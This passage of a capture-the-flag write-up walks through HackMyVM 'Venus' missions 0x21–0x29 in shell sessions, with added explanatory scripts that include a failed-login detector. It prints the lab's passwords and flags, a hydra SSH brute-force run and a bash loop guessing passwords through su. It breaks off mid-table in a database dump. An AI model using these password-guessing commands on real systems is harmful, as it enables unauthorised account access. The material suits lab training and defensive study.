21 iris
```bash
iris@venus:~$ ls -la
total 60
drwxr-x--- 3 root iris 4096 Apr 5 06:28 .
drwxr-xr-x 1 root root 4096 Apr 5 06:27 ..
-rw-r--r-- 1 iris iris 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 iris iris 3526 Apr 23 2023 .bashrc
-rw-r--r-- 1 iris iris 807 Apr 23 2023 .profile
drwxr-xr-x 2 root root 4096 Apr 5 06:28 .ssh
-rw-r----- 1 root iris 17484 Apr 5 06:28 eloise
-rw-r----- 1 root iris 31 Apr 5 06:27 flagz.txt
-rw-r----- 1 root iris 16 Apr 5 06:28 irispass.txt
-rw-r----- 1 root iris 195 Apr 5 06:27 mission.txt
iris@venus:~$ cat flagz.txt
8===ClrdWOqlZ1vL61zSk9Va===D~~
iris@venus:~$ cat mission.txt
################
# MISSION 0x21 #
################
## EN ##
User eloise has saved her password in a particular way.
## ES ##
La usuaria eloise ha guardado su password de una forma particular.
iris@venus:~$ catt eloise
-bash: catt: command not found
iris@venus:~$ cat eloise
[... Base64 output omitted ...]
iris@venus:~$ cat irispass.txt
kYjyoLcnBZ9EJdz
iris@venus:~$ cat eloise | base64 -d
����JFIF``���ExifMM;sML�J��� >������85��85� �2021:11:10 10:18:032021:11:10 10:18:03sML�� http://ns.adobe.com/xap/1.0/<?xpacket begin='' id='W5M0MpCehiHzreSzNTczkc9d'?>
<x:xmpmeta xmlns:x="adobe:ns:meta/"><rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"><rdf:Description rdf:about="uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b" xmlns:dc="http://purl.org/dc/elements/1.1/"/><rdf:Description rdf:about="uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b" xmlns:xmp="http://ns.adobe.com/xap/1.0/"><xmp:CreateDate>2021-11-10T10:18:03.849</xmp:CreateDate></rdf:Description><rdf:Description rdf:about="uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b" xmlns:dc="http://purl.org/dc/elements/1.1/"><dc:creator><rdf:Seq xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"><rdf:li>sML</rdf:li></rdf:Seq>
</dc:creator></rdf:Description></rdf:RDF></x:xmpmeta>
........
iris@venus:~$
```
The file looks like a photo, so I tried to identify it with CyberChef: after Base64-decoding it, clicking the magic wand gives the password:

```
yOUJlV0SHOnbSPm
```
22 eloise
```bash
eloise@venus:~$ ls -la
total 36
drwxr-x--- 2 root eloise 4096 Apr 5 06:28 .
drwxr-xr-x 1 root root 4096 Apr 5 06:27 ..
-rw-r--r-- 1 eloise eloise 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 eloise eloise 3526 Apr 23 2023 .bashrc
-rw-r--r-- 1 eloise eloise 807 Apr 23 2023 .profile
-rw-r----- 1 root eloise 31 Apr 5 06:27 flagz.txt
-rw-r----- 1 root eloise 50 Apr 5 06:28 hi
-rw-r----- 1 root eloise 194 Apr 5 06:27 mission.txt
eloise@venus:~$ cat hi
00000000: 7576 4d77 4644 5172 5157 504d 6547 500a
eloise@venus:~$ cat flagz.txt
8===57CzBLKaEq2N8YBFRu31===D~~
eloise@venus:~$ cat mission.txt
################
# MISSION 0x22 #
################
## EN ##
User lucia has been creative in saving her password.
## ES ##
La usuaria lucia ha sido creativa en la forma de guardar su password.
eloise@venus:~$ xxd hi
00000000: 3030 3030 3030 3030 3a20 3735 3736 2034  00000000: 7576 4
00000010: 6437 3720 3436 3434 2035 3137 3220 3531  d77 4644 5172 51
00000020: 3537 2035 3034 6420 3635 3437 2035 3030  57 504d 6547 500
00000030: 610a                                     a.
eloise@venus:~$ xxd -h
Usage:
       xxd [options] [infile [outfile]]
    or
       xxd -r [-s [-]offset] [-c cols] [-ps] [infile [outfile]]
Options:
    -a          toggle autoskip: A single '*' replaces nul-lines. Default off.
    -b          binary digit dump (incompatible with -ps,-i,-r). Default hex.
    -C          capitalize variable names in C include file style (-i).
    -c cols     format <cols> octets per line. Default 16 (-i: 12, -ps: 30).
    -E          show characters in EBCDIC. Default ASCII.
    -e          little-endian dump (incompatible with -ps,-i,-r).
    -g bytes    number of octets per group in normal output. Default 2 (-e: 4).
    -h          print this summary.
    -i          output in C include file style.
    -l len      stop after <len> octets.
    -n name     set the variable name used in C include output (-i).
    -o off      add <off> to the displayed file position.
    -ps         output in postscript plain hexdump style.
    -r          reverse operation: convert (or patch) hexdump into binary.
    -r -s off   revert with <off> added to file positions found in hexdump.
    -d          show offset in decimal instead of hex.
    -s [+][-]seek  start at <seek> bytes abs. (or +: rel.) infile offset.
    -u          use upper case hex letters.
    -v          show version: "xxd 2022-01-14 by Juergen Weigert et al.".
eloise@venus:~$ xxd -r hi
uvMwFDQrQWPMeGP
```
23 lucia
```bash
lucia@venus:~$ ls -la
total 36
drwxr-x--- 2 root lucia 4096 Apr 5 06:28 .
drwxr-xr-x 1 root root 4096 Apr 5 06:27 ..
-rw-r--r-- 1 lucia lucia 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 lucia lucia 3526 Apr 23 2023 .bashrc
-rw-r--r-- 1 lucia lucia 807 Apr 23 2023 .profile
-rw-r----- 1 root lucia 1998 Apr 5 06:28 dict.txt
-rw-r----- 1 root lucia 31 Apr 5 06:27 flagz.txt
-rw-r----- 1 root lucia 397 Apr 5 06:27 mission.txt
lucia@venus:~$ cat flagz.txt
8===5Sr2pqeVTmn8RaaPmTPE===D~~
lucia@venus:~$ cat mission.txt
################
# MISSION 0x23 #
################
## EN ##
The user isabel has left her password in a file in the /etc/xdg folder but she does not remember the name, however she has dict.txt that can help her to remember.
## ES ##
La usuaria isabel ha dejado su password en un fichero en la carpeta /etc/xdg pero no recuerda el nombre, sin embargo tiene dict.txt que puede ayudarle a recordar.
lucia@venus:~$ head -n 10 dict.txt
s
hack
hacker
handler
hanlder
happening
head
header
headers
lucia@venus:~$ ls /etc/xdg
ls: cannot open directory '/etc/xdg': Permission denied
```
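The only option is to brute-force the file name. I could not write this one myself, so I looked at a script written by someone else to learn from it:

```bash
while IFS= read -r line; do readlink -e /etc/xdg/$line; done<dict.txt
```

- `IFS=`: the input line is not split, so leading and trailing whitespace is kept.
- `-r`: backslashes are not interpreted.
- `readlink`: resolves symbolic links and returns the path of the target file.
- `-e`: returns the absolute path, and prints it only when every component of the path exists, which is why only real file names produce output.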
```bash
lucia@venus:~$ while IFS= read -r line; do readlink -e /etc/xdg/$line; done<dict.txt
/etc/xdg
/etc/xdg/readme
lucia@venus:~$ cat /etc/xdg/readme
H5ol8Z2mrRsorC0
```
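Why the loop works even though `ls /etc/xdg` is denied, as an added example that is not part of the original write-up: a directory that grants search (`x`) but not read (`r`) hides the listing, yet any name that can be guessed can still be resolved. It assumes `/etc/xdg` on the target has such a mode (the page does not show it); `probe_names`, `is_search_only` and the temporary sandbox are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example: everything runs inside a throwaway temp directory.

# Print every wordlist entry ($2) that exists inside directory $1.
probe_names() {
    local dir="$1" dict="$2" line
    while IFS= read -r line || [ -n "$line" ]; do
        # An empty line (or ".") resolves to the directory itself, not to a file in it.
        [ -n "$line" ] || continue
        # Skip entries that would step outside the directory.
        case $line in */*|.|..) continue ;; esac
        # Testing a known name only needs search (x) permission on $dir.
        if [ -e "$dir/$line" ]; then
            printf '%s\n' "$dir/$line"
        fi
    done < "$dict"
}

# Audit check: succeed when "others" may traverse $1 but may not list it.
# Such a mode hides names from ls, but not from a dictionary of guesses.
is_search_only() {
    local perms r x
    perms=$(ls -ld -- "$1") || return 2
    r=$(printf '%s' "$perms" | cut -c8)     # others: read bit
    x=$(printf '%s' "$perms" | cut -c10)    # others: execute/search bit
    [ "$r" = "-" ] || return 1
    case $x in x|t) return 0 ;; *) return 1 ;; esac
}

demo() {
    local box
    box=$(mktemp -d) || return 1
    mkdir "$box/xdg"
    printf 'constructed secret\n' > "$box/xdg/readme"
    chmod 711 "$box/xdg"                    # rwx--x--x: traverse yes, list no
    # Constructed wordlist, including an empty line and a traversal attempt.
    printf '%s\n' '' hack header readme ../xdg > "$box/dict.txt"
    is_search_only "$box/xdg" && echo "search-only for others: $box/xdg"
    probe_names "$box/xdg" "$box/dict.txt"
    rm -rf "$box"
}
demo
```

The mode of the file itself is what protects its content: a secret inside a search-only directory is only as private as its name is hard to guess.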
24 isabel
```bash
lucia@venus:~$ su isabel
Password:
isabel@venus:/pwned/lucia$ cd ~
isabel@venus:~$ ls -la
total 180
drwxr-x--- 2 root isabel 4096 Apr 5 06:28 .
drwxr-xr-x 1 root root 4096 Apr 5 06:27 ..
-rw-r--r-- 1 isabel isabel 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 isabel isabel 3526 Apr 23 2023 .bashrc
-rw-r--r-- 1 isabel isabel 807 Apr 23 2023 .profile
-rw-r----- 1 root isabel 150544 Apr 5 06:28 different.txt
-rw-r----- 1 root isabel 31 Apr 5 06:27 flagz.txt
-rw-r----- 1 root isabel 245 Apr 5 06:27 mission.txt
isabel@venus:~$ cat flagz.txt
8===Md2CU83GtVfouhm9U0AS===D~~
isabel@venus:~$ cat mission.txt
################
# MISSION 0x24 #
################
## EN ##
The password of the user freya is the only string that is not repeated in different.txt
## ES ##
La password de la usuaria freya es el unico string que no se repite en different.txt
isabel@venus:~$ head different.txt -n 10
3e73c17ede4b9b4
3e73c17ede4b9b4
fb834b364abb5eb
fb834b364abb5eb
36771e2733ec17c
36771e2733ec17c
47949b26a7c452a
47949b26a7c452a
371cedbb4a4e593
371cedbb4a4e593
isabel@venus:~$ cat different.txt | uniq -c
      2 3e73c17ede4b9b4
      2 fb834b364abb5eb
      2 36771e2733ec17c
.......
isabel@venus:~$ cat different.txt | uniq -c | sort -n
      1 EEDyYFDwYsmYawj
      2 00010b0765c11cc
      2 00205d587090943
      2 00213023c9abfbe
      2 002b4e53be7876f
      2 0034acdf29fb163
.......
```
That gives the password: EEDyYFDwYsmYawj

```bash
isabel@venus:~$ su -l freya
Password:
freya@venus:~$
```
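A caveat on `uniq -c`, shown as an added example that is not part of the original write-up: `uniq` only collapses adjacent equal lines, so the pipeline above is correct because the duplicates in `different.txt` sit next to each other. The function names and the sample data are constructed; the functions assume lines without spaces, as in the file shown.

```bash
#!/usr/bin/env bash
# Added example: compares the page's pipeline with an order-independent count.

# The page's approach: lines that form a run of length 1 (adjacent comparison only).
adjacent_singletons() {
    uniq -c "$1" | awk '$1 == 1 { print $2 }' | sort
}

# Order-independent: count each line across the whole file.
true_singletons() {
    awk '{ seen[$0]++ } END { for (l in seen) if (seen[l] == 1) print l }' "$1" | sort
}

# Succeeds only when every repeated value is adjacent to its copies,
# i.e. when the uniq -c shortcut is safe on this file without sorting first.
duplicates_are_adjacent() {
    awk '$0 != prev && ($0 in seen) { bad = 1; exit }
         { seen[$0] = 1; prev = $0 }
         END { exit bad + 0 }' "$1"
}

demo() {
    local f
    f=$(mktemp) || return 1
    # Constructed sample: the duplicates are NOT adjacent.
    printf '%s\n' aaa111 bbb222 aaa111 ccc333 bbb222 > "$f"
    if duplicates_are_adjacent "$f"; then
        echo "uniq -c alone is safe on this file"
    else
        echo "duplicates are scattered: sort first or count with awk"
    fi
    echo "uniq -c reports: $(adjacent_singletons "$f" | tr '\n' ' ')"
    echo "real answer:     $(true_singletons "$f")"
    rm -f "$f"
}
demo
```

On a file of unknown order, `sort different.txt | uniq -u` gives the same result as `true_singletons`.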
25 freya
```bash
freya@venus:~$ ls -la
total 32
drwxr-x--- 2 root freya 4096 Apr 5 06:27 .
drwxr-xr-x 1 root root 4096 Apr 5 06:27 ..
-rw-r--r-- 1 freya freya 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 freya freya 3526 Apr 23 2023 .bashrc
-rw-r--r-- 1 freya freya 807 Apr 23 2023 .profile
-rw-r----- 1 root freya 31 Apr 5 06:27 flagz.txt
-rw-r----- 1 root freya 262 Apr 5 06:27 mission.txt
freya@venus:~$ cat flagz.txt
8===m1rRSv2pdm3sBGmgidul===D~~
freya@venus:~$ cat mission.txt
################
# MISSION 0x25 #
################
## EN ##
User alexa puts her password in a .txt file in /free every minute and then deletes it.
## ES ##
La usuaria alexa pone su password en un fichero .txt en la carpeta /free cada minuto y luego lo borra.
freya@venus:~$ while true; do cat /free/* 2>/dev/null; done
mxq9O3MSxxX9Q3S
mxq9O3MSxxX9Q3S
mxq9O3MSxxX9Q3S
mxq9O3MSxxX9Q3S
mxq9O3MSxxX9Q3S
mxq9O3MSxxX9Q3S
.......
freya@venus:~$ su -l alexa
Password:
alexa@venus:~$
```
26 alexa
```bash
alexa@venus:~$ ls -la
total 32
drwxr-x--- 2 root alexa 4096 Apr 5 06:27 .
drwxr-xr-x 1 root root 4096 Apr 5 06:27 ..
-rw-r--r-- 1 alexa alexa 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 alexa alexa 3526 Apr 23 2023 .bashrc
-rw-r--r-- 1 alexa alexa 807 Apr 23 2023 .profile
-rw-r----- 1 root alexa 31 Apr 5 06:27 flagz.txt
-rw-r----- 1 root alexa 172 Apr 5 06:27 mission.txt
alexa@venus:~$ cat flagz.txt
8===12ALP3eLlJ1GrTBxwJQM===D~~
alexa@venus:~$ cat mission.txt
################
# MISSION 0x26 #
################
## EN ##
The password of the user ariel is online! (HTTP)
## ES ##
El password de la usuaria ariel esta online! (HTTP)
alexa@venus:~$ curl http://127.0.1
33EtHoz9a0w2Yqo
```
27 ariel
```bash
ariel@venus:~$ ls -la
total 44
drwxr-x--- 2 root ariel 4096 Apr 5 06:28 .
drwxr-xr-x 1 root root 4096 Apr 5 06:27 ..
-rw-r--r-- 1 ariel ariel 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 ariel ariel 3526 Apr 23 2023 .bashrc
-rw-r----- 1 root ariel 12288 Apr 5 06:28 .goas.swp
-rw-r--r-- 1 ariel ariel 807 Apr 23 2023 .profile
-rw-r----- 1 root ariel 31 Apr 5 06:27 flagz.txt
-rw-r----- 1 root ariel 254 Apr 5 06:27 mission.txt
ariel@venus:~$ cat flagz.txt
8===lqTeJ1msxhNjNJCptxmZ===D~~
ariel@venus:~$ cat mission.txt
################
# MISSION 0x27 #
################
## EN ##
Seems that ariel dont save the password for lola, but there is a temporal file.
## ES ##
Parece ser que a ariel no le dio tiempo a guardar la password de lola... menosmal que hay un temporal!
ariel@venus:~$ vim -h
VIM - Vi IMproved 9.0 (2022 Jun 28, compiled May 04 2023 10:24:44)

Usage: vim [arguments] [file ..]       edit specified file(s)
   or: vim [arguments] -               read text from stdin
   or: vim [arguments] -t tag          edit file where tag is defined
   or: vim [arguments] -q [errorfile]  edit file with first error

Arguments:
   --                   Only file names after this
   -v                   Vi mode (like "vi")
   -e                   Ex mode (like "ex")
   -E                   Improved Ex mode
   -s                   Silent (batch) mode (only for "ex")
   -d                   Diff mode (like "vimdiff")
   -y                   Easy mode (like "evim", modeless)
   -R                   Readonly mode (like "view")
   -Z                   Restricted mode (like "rvim")
   -m                   Modifications (writing files) not allowed
   -M                   Modifications in text not allowed
   -b                   Binary mode
   -l                   Lisp mode
   -C                   Compatible with Vi: 'compatible'
   -N                   Not fully Vi compatible: 'nocompatible'
   -V[N][fname]         Be verbose [level N] [log messages to fname]
   -D                   Debugging mode
   -n                   No swap file, use memory only
   -r                   List swap files and exit
   -r (with file name)  Recover crashed session
   -L                   Same as -r
   -A                   Start in Arabic mode
   -H                   Start in Hebrew mode
   -T <terminal>        Set terminal type to <terminal>
   --not-a-term         Skip warning for input/output not being a terminal
   --ttyfail            Exit if input or output is not a terminal
   -u <vimrc>           Use <vimrc> instead of any .vimrc
   --noplugin           Don't load plugin scripts
   -p[N]                Open N tab pages (default: one for each file)
   -o[N]                Open N windows (default: one for each file)
   -O[N]                Like -o but split vertically
   +                    Start at end of file
   +<lnum>              Start at line <lnum>
   --cmd <command>      Execute <command> before loading any vimrc file
   -c <command>         Execute <command> after loading the first file
   -S <session>         Source file <session> after loading the first file
   -s <scriptin>        Read Normal mode commands from file <scriptin>
   -w <scriptout>       Append all typed commands to file <scriptout>
   -W <scriptout>       Write all typed commands to file <scriptout>
   -x                   Edit encrypted files
   --startuptime <file> Write startup timing messages to <file>
   --log <file>         Start logging to <file> early
   -i <viminfo>         Use <viminfo> instead of .viminfo
   --clean              'nocompatible', Vim defaults, no plugins, no viminfo
   -h  or  --help       Print Help (this message) and exit
   --version            Print version information and exit
ariel@venus:~$ vim -r .goas.swp
Thats my little DIc with my old and current passwOrds:
-->ppkJjqYvSCIyAhK
-->cOXlRYXtJWnVQEG
--rxhKeFKveeKqpwp
-->RGBEMbZHZRgXZnu
-->IaOpTdAuhSjGZnu
-->NdnszvjulNellbK
-->GBUguuSpXVjpxLc
-->rSkPlPhymYcerMJ
-->PEOppdOkSqJZweH
-->EKvJoTBYlwtwFmv
-->d3LieOzRGX5wud6
-->mYhQVLDKdJrsIwG
-->DabEJLmAbOQxEnD
-->LkWReDaaLCMDlLf
-->cbjYGSvqAsqIvdg
-->QsymOOVbzSaKmRm
-->bnQgcXYamhSDSff
-->VVjqJGRrnfKmcgD
```
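Pressing `gg` jumps to the first character at the top of the file, `dd` deletes the current line, `dw` deletes a word, and `.` repeats the previous command. That is enough to remove every `-->` and every blank line. Then save with:

```
:w /tmp/pass
:q!
```

After that the list can be brute-forced. I used hydra for this, but a bash script would also work: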
```bash
hgbe02@pwn:~/temp$ hydra -l lola -P pass ssh://venus.hackmyvm.eu:5000
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-07-01 01:44:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 18 login tries (l:1/p:18), ~2 tries per task
[DATA] attacking ssh://venus.hackmyvm.eu:5000/
[5000][ssh] host: venus.hackmyvm.eu login: lola password: d3LieOzRGX5wud6
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-07-01 01:44:14
```
Here is a script written by an expert, which is very elegant:

```bash
while IFS= read -r line; do echo $line | timeout 2 su lola 2>/dev/null; if [ $? -eq 0 ]; then echo $line; break; fi; done < /tmp/dict.txt
```
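What the two approaches above leave behind in the authentication log, as an added example that is not part of the original write-up: the hydra run made 18 login tries in about ten seconds, and both it and the `su` loop produce a burst of failures against one account. The function names, the host name `host1`, the addresses and every log line below are constructed; the detector assumes classic syslog timestamps and events from a single day.

```bash
#!/usr/bin/env bash
# Added example: flag accounts that receive a burst of failed logins,
# and whether a successful SSH login followed the failures.

# Constructed sample in the usual sshd / pam_unix syslog wording.
sample_log() {
cat <<'EOF'
Jul  1 01:44:05 host1 sshd[2211]: Failed password for lola from 203.0.113.7 port 40112 ssh2
Jul  1 01:44:05 host1 sshd[2212]: Failed password for lola from 203.0.113.7 port 40114 ssh2
Jul  1 01:44:06 host1 sshd[2213]: Failed password for lola from 203.0.113.7 port 40116 ssh2
Jul  1 01:44:08 host1 sshd[2214]: Failed password for lola from 203.0.113.7 port 40118 ssh2
Jul  1 01:44:09 host1 sshd[2215]: Failed password for lola from 203.0.113.7 port 40120 ssh2
Jul  1 01:44:10 host1 sshd[2216]: Accepted password for lola from 203.0.113.7 port 40122 ssh2
Jul  1 01:50:00 host1 sshd[2290]: Failed password for invalid user iris2 from 198.51.100.9 port 51000 ssh2
Jul  1 02:10:01 host1 su[3301]: pam_unix(su:auth): authentication failure; logname=ariel uid=1027 euid=0 tty=/dev/pts/3 ruser=ariel rhost=  user=lola
Jul  1 02:10:02 host1 su[3302]: pam_unix(su:auth): authentication failure; logname=ariel uid=1027 euid=0 tty=/dev/pts/3 ruser=ariel rhost=  user=lola
Jul  1 02:10:03 host1 su[3303]: pam_unix(su:auth): authentication failure; logname=ariel uid=1027 euid=0 tty=/dev/pts/3 ruser=ariel rhost=  user=lola
EOF
}

# $1 = minimum failures, $2 = window in seconds, log on stdin.
# Prints "user peak-failures-in-window status" for every account at or above $1.
failed_auth_bursts() {
    awk -v min="$1" -v win="$2" '
    function secs(t,  p) { split(t, p, ":"); return p[1] * 3600 + p[2] * 60 + p[3] }
    function after(  f)  { split(substr($0, RSTART + RLENGTH), f, " "); return f[1] }
    {
        t = secs($3); user = ""; ok = 0
        if (match($0, /sshd\[[0-9]+\]: Failed password for (invalid user )?/)) {
            user = after()
        } else if (match($0, /sshd\[[0-9]+\]: Accepted password for /)) {
            user = after(); ok = 1
        } else if ($0 ~ /pam_unix\(su(-l)?:auth\): authentication failure/ &&
                   match($0, / user=[^ ]+/)) {
            user = substr($0, RSTART + 6, RLENGTH - 6)   # target account of su
        }
        if (user == "") next
        if (ok) {
            # A success shortly after failures suggests a guessed password.
            if ((user in last) && t - last[user] <= win) won[user] = 1
            next
        }
        n[user]++; ts[user, n[user]] = t; last[user] = t
        if (!(user in lo)) lo[user] = 1
        # Slide the window start forward until it is within win seconds of now.
        while (t - ts[user, lo[user]] > win) lo[user]++
        c = n[user] - lo[user] + 1
        if (c > peak[user]) peak[user] = c
    }
    END {
        for (u in peak) if (peak[u] >= min)
            print u, peak[u], ((u in won) ? "success-after-failures" : "no-success")
    }' | sort
}

sample_log | failed_auth_bursts 5 60
```

Rate limits such as `MaxAuthTries`, a lockout module or fail2ban act on the same signal; the `success-after-failures` case is the one that calls for a password reset.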
28 lola
```bash
lola@venus:~$ ls -la
total 36
drwxr-x--- 2 root lola 4096 Apr 5 06:28 .
drwxr-xr-x 1 root root 4096 Apr 5 06:27 ..
-rw-r--r-- 1 lola lola 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 lola lola 3526 Apr 23 2023 .bashrc
-rw-r--r-- 1 lola lola 807 Apr 23 2023 .profile
-rw-r----- 1 root lola 31 Apr 5 06:27 flagz.txt
-rw-r----- 1 root lola 272 Apr 5 06:27 mission.txt
-rw-r----- 1 root lola 1438 Apr 5 06:28 pages.txt
lola@venus:~$ cat flagz.txt
8===TMYRw853hx8yKRocFMgM===D~~
lola@venus:~$ cat mission.txt
################
# MISSION 0x28 #
################
## EN ##
The user celeste has left a list of names of possible .html pages where to find her password.
## ES ##
La usuaria celeste ha dejado un listado de nombres de posibles paginas .html donde encontrar su password.
lola@venus:~$ cat pages.txt
new-servers server-updates SenSage_LEO 1355485668 25101 Real-Time Communication ulist VGVsbmV0 15915 mumbo planet-icon DealTime_57c 121616253 708303201 suppliers_logos imagesPage bar-left webdev-logo h-line 34552 479800180 1080410073 symm 1665300941 time-date image-effects 1412058599 1166197595 1115392848 1083085151 Dotster_47c agi grotius primers decades upfront sitecredits SSC Kids-Software Projector-Accessories Ink Microphones Satellite-Radio existingcustomers media-types junkbuster symankr career-opportunities corner_ur corner_ul findlaw classaction Factsheets Comets symantch dark_grey Sunbelt penguin_log cswift eref symantecpress symanbr h_consumerassistanceheader h_homeb h_parentsb h_privacyb h_consumerassistanceb h_consumerfaqsb h_mainheader dmasponsorship consumerfaqs symantde pc_dots ci_4958157 themonitor Columbus glo regan GR2006120500981 uscode49 uscode39 uscode20 DEFAULT uscode12 toxins ferris Jan07 000109 efpa funders badads civicactions iraq_plans askthepilot215 mail_cover 081606 092306 book_review consumerprotection facta 050518 IWC ahead shah rockertraining respiratory 197442_1 xCH-computer_accessories xCH-computer_memory xCH-networking xCH-components xCH-inputdevices xPP-Monitors xPP-PC_Desktops xCH-hardware 116044 20061226 logo_eseminars cebolla logo_pcmag 1999-02 pcmagnetwork 40305 breastcancer infocusRel key2 xCH-software check_prices rev_snapshot ca-library pubs1 bullet_P1 bullet_B1 spectral
lola@venus:~$ while IFS= read -r line; do curl -s http://127.0.1/$line ; done < pages.txt 2>/dev/null | grep -v '<'
33EtHoz9a0w2Yqo
33EtHoz9a0w2Yqo
```
But switching users with this value did not work; it may be a rabbit hole, so I changed the command:
lola@venus:~$ while IFS= read -r line; do curl -s http://127.0.0.1/$line.html ; done < pages.txt 2>/dev/null | grep -v ' <' VLSNMTKwSV2o8Tn
29 celeste
celeste@venus:~$ ls -la total 32 drwxr-x--- 2 root celeste 4096 Apr 5 06:27 . drwxr-xr-x 1 root root 4096 Apr 5 06:27 .. -rw-r--r-- 1 celeste celeste 220 Apr 23 2023 .bash_logout -rw-r--r-- 1 celeste celeste 3526 Apr 23 2023 .bashrc -rw-r--r-- 1 celeste celeste 807 Apr 23 2023 .profile -rw-r----- 1 root celeste 31 Apr 5 06:27 flagz.txt -rw-r----- 1 root celeste 179 Apr 5 06:27 mission.txt celeste@venus:~$ cat flagz.txt 8===TrdsvMy99slFZtd4Cy4Q===D~~ celeste@venus:~$ cat mission.txt ################ # MISSION 0x29 # ################ ## EN ## The user celeste has access to mysql but for what? ## ES ## La usuaria celeste tiene acceso al mysql, pero para que? celeste@venus:~$ mysql -uceleste -pVLSNMTKwSV2o8Tn Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 1341 Server version: 10.11.6-MariaDB-0+deb12u1 Debian 12 Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. 
MariaDB [(none)]> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | venus | +--------------------+ 2 rows in set (0.002 sec) MariaDB [(none)]> use venus; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed MariaDB [venus]> show tables; +-----------------+ | Tables_in_venus | +-----------------+ | people | +-----------------+ 1 row in set (0.001 sec) MariaDB [venus]> select * from people; +-----------+---------------+--------------------------------+ | id_people | uzer | pazz | +-----------+---------------+--------------------------------+ | 1 | nuna | ixpfdsvcxeqdW | | 2 | nona | ixpvcxvcxeqdW | | 3 | manue | ixpfdsfdseqdW | | 4 | samoa | ixperrewrweqdW | | 5 | dsaewq | ixpefdsfsqdW | | 6 | fdsfewrew | ixpedvcxv4qdW | | 7 | koiuoiudsadas | ixpredsfdeqdW | | 8 | vcxfdsfew | ixp342432eqdW | | 9 | dasd | ixpeiuyiuyqdW | | 10 | helen | uytuytjhgixpeqdW | | 11 | tudou | ijhgjghxpeqfdfsfddW | | 12 | fdsoiurew | ixpfdsfsdsvcxvcxeqdW | | 13 | inan | imbnmnbxpeqdW | | 14 | zkret | ixpeqkjhkhjkdW | | 15 | cjhcx | i432423xpeqdW | | 16 | sfdfdsml | ixpeqdsfsdfdsfW | | 17 | svcxvcxml | 432423ixpeqdW | | 18 | xml | ixpejhgjhgqdW | | 19 | pdf | ixperewrewrewqdW | | 20 | txt | ixpeuytuytqdW | | 21 | vcxvcx | ixpefdsfdsfdfdsqdW | | 22 | dsadsa | ixpeqdjhkjhW | | 23 | lel | ixpvcxvcxvcxeqdW | | 24 | lul | ixpeqdmnbmnbmnbmW | | 25 | dog | ixperewrewrewqdW | | 26 | cat | ixvcxvdsfsdvpeqdW | | 27 | pet | ixiufohsyuoirewpeqdW | | 28 | pzzz | ixvcxvcxvpeqdW | | 29 | ls | ixpehgfdhdhqdW | | 30 | vi | ixpetrvvrqdW | | 31 | tmux | iuovcxoiujvcxixpeqdW | | 32 | screen | ixpeqrewregfdgdW | | 33 | yes | ixpebvcgdfgqdW | | 34 | nop | ixpefdsqdW | | 35 | haha | 8===xKmPDsJSKpHLzkqKXyjx===D~~ | | 36 | love | ixpegfdgqdW | | 37 | dsadsa | fdsvcxvcxixpeqdW | | 38 | d4t4 | erwerewreixpeqdW | | 39 | nna | gdfgdixpeqdW | | 40 | nin | aaafdixpeqdW | | 41 | tre 
| fdsafixpeqdW | | 42 | tfas | igfdgfdgxpeqdW | | 43 | zcxc | ixfdgdfgpeqdW | | 44 | yuio | ixpgbvcbvcbeqdW | | 45 | jhgyurtrt | treterterixpeqdW | | 46 | lodsa | itreterxpeqdW | | 47 | zarah | ixpvcbvcbeqdW | | 48 | zkkad | ixpedfgvbcxbvcqdW | | 49 | bvher | vcxvcxgfdgfdixpeqdW | | 50 | dsadsa | ixpeqergdfwer32dW | | 51 | ch4rm | ixpeewf23qdW | | 52 | Aza | ixpjhgjgheqdW | | 53 | avij | ixpegfdgdfgqdW | | 54 | crom | ixpefdbvvcbrqdW | | 55 | bubu | ixpetretretqdW | | 56 | bebe | ixpeghfgfdqdW | | 57 | baba | ixpeffesfqdW | | 58 | bael | ixpesdvsdvsdqdW | | 59 | vaze | ixpe23r23rf23qdW | | 60 | upper | ixpe43r43rqdW | | 61 | loz | ixpeqddfsdW | | 62 | mind | ixpfsdfsdfsdeqdW | | 63 | mymy | ixpevcxvqdW | | 64 | ina | ixpee23e32rqdW | | 65 | ein | ixpejytjytjhgjqdW | | 66 | n1n4 | ixpehgjghjhghgqdW | | 67 | where | ixljkgjgpeqdW | | 68 | you | ixpeqdhggjhgjW | | 69 | are | ixVCXVCXVCXVCXdW | | 70 | what | ixpeqhgjggdW | | 71 | dsaqqqqqq | ixpeqVCXVCXdW | | 72 | h0j3n | ixpemnbmbnmghqdW | | 73 | nana | ixpeqVSDFWCdW | | 74 | nina | ixpeqdWuvC5N9kG | | 75 | nunu | ixpeSFDSFDSVCXqdW | | 76 | fdse | ixpeDFSWEF2qdW | | 77 | dsar | ixpeF43F3F34qdW | | 78 | yop | ixpeqdWCSDFDSFD | | 79 | loco | ixpeF43F34F3qdW | | 80 | zaza | ixpeYUTHNYGTHYTqdW | | 81 | jhon | ixpeFDSJYTUJTYqdW | | 82 | tell | ixpeHYTTqdW | | 83 | ma | uyixptje4FSFWEFqdW | | 84 | mum | jghixpeqdW | | 85 | nanaa | 432432ixpeqdW | | 86 | nnnniinn | irewxpeqdW | | 87 | iourewoiure | rewixpeqdW | | 88 | 